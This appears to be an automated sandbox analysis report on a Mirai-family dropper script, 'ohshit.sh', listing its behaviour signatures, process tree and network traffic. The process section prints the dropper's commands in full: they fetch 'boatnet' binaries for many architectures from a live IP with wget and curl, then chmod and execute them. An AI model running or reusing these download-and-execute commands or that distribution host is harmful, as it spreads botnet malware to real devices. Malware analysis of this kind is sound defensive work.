Analysis Overview
SHA256
5b35f387f69bcb231b7e339c9ddeb610fd73ebf848f8cefdcfb26a2faabc5c6f
Threat Level: Known bad
The file ohshit.sh was found to be: Known bad.
Malicious Activity Summary
Mirai
Mirai family
Modifies Watchdog functionality
Executes dropped EXE
File and Directory Permissions Modification
Writes file to system bin folder
Enumerates running processes
UPX packed file
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 04:14
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 04:14
Reported
2024-11-09 04:17
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
148s
Max time network
149s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
| N/A | /tmp/WTF | /tmp/WTF | N/A |
Modifies Watchdog functionality
| Description | Indicator | Process | Target |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/watchdog | /tmp/WTF | N/A |
| File opened for modification | /dev/misc/watchdog | /tmp/WTF | N/A |
Enumerates running processes
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /bin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
| File opened for modification | /sbin/watchdog | /tmp/WTF | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/1595/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1157/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1162/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1569/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1262/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/513/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1579/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/543/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1209/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1364/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/462/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1153/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1116/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/461/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/599/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1116/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1216/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1593/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/749/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1334/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1561/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1585/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1401/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1555/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/729/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1079/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1498/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1045/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1089/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/669/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1530/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/544/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1107/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1498/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1683/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1190/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1083/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1086/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1306/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/447/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/463/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1571/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1035/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1280/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1065/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1190/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1364/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/975/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1096/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/761/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1166/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1187/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1553/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/666/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/980/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1547/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/580/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1661/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1603/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1498/cmdline | /tmp/WTF | N/A |
| File opened for reading | /proc/1563/cmdline | /tmp/WTF | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.ppc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arc | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86_64 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.spc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.mips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i468 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.i686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.m68k | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.arm5 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.sh4 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/boatnet.x86 | /usr/bin/wget | N/A |
| File opened for modification | /tmp/WTF | /tmp/ohshit.sh | N/A |
| File opened for modification | /tmp/boatnet.mpsl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/boatnet.arm | /usr/bin/wget | N/A |
Processes
/tmp/ohshit.sh
[/tmp/ohshit.sh]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86]
/bin/cat
[cat boatnet.x86]
/bin/chmod
[chmod +x boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mips]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mips]
/bin/chmod
[chmod +x boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arc]
/bin/chmod
[chmod +x boatnet.arc boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i468]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i468]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.i686]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.i686]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.x86_64]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.x86_64]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.mpsl]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.mpsl]
/bin/chmod
[chmod +x boatnet.arc boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm5]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm5]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm6]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm6]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-glg8Yq systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.arm7]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.arm7]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-mAhB1J systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.ppc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.ppc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.spc]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.spc]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-bolt.service-EdkoHW systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.m68k]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.m68k]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
/usr/bin/wget
[wget http://77.221.151.63/hiddenbin/boatnet.sh4]
/usr/bin/curl
[curl -O http://77.221.151.63/hiddenbin/boatnet.sh4]
/bin/chmod
[chmod +x boatnet.arc boatnet.arm boatnet.arm5 boatnet.arm6 boatnet.arm7 boatnet.i468 boatnet.i686 boatnet.m68k boatnet.mips boatnet.mpsl boatnet.ppc boatnet.sh4 boatnet.spc boatnet.x86 boatnet.x86_64 config-err-Ykb1EJ netplan_bkesz5om ohshit.sh snap-private-tmp ssh-BWfFJo8H9ZMp systemd-private-9e609f7562754bc6a83b75af71ffbe40-colord.service-Y8RAiN systemd-private-9e609f7562754bc6a83b75af71ffbe40-ModemManager.service-Ojx5Aj systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-resolved.service-AFvYto systemd-private-9e609f7562754bc6a83b75af71ffbe40-systemd-timedated.service-eLKGOZ WTF]
/tmp/WTF
[./WTF]
Network
| Country | Destination | Domain | Proto |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 185.125.188.62:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| US | 151.101.193.91:443 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 195.181.164.14:443 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:3778 | tcp | |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
| GB | 77.221.151.63:80 | 77.221.151.63 | tcp |
